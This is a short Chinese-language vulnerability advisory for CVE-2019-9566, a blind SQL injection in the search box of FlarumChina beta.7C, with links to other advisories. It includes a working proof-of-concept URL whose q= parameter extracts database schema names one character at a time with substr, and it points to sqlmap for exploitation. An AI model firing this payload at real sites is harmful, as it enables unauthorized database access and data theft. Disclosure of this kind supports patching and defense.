CVE中文申请站

一、漏洞摘要

漏洞名称: FlarumChina-beta.7C前台SQL注入
上报日期: 2019-03-03
漏洞发现者: admin-神风
产品首页: https://github.com/skywalker512/FlarumChina/
软件链接: https://github.com/skywalker512/FlarumChina/
版本: FlarumChina-beta.7C
CVE编号: CVE-2019-9566


二、漏洞概述

前台搜索框一处盲注
可以通过substr函数进行注入
lll.png

三、利用代码

可以使用sqlmap进行注入。
Exp:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/127/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9566
exploit-db:发布中
cxsecurity:https://cxsecurity.com/issue/WLB-2019010224
发现者blog:https://www.cnblogs.com/wh4am1/p/10257593.html

标签: SQL注入, FlarumChina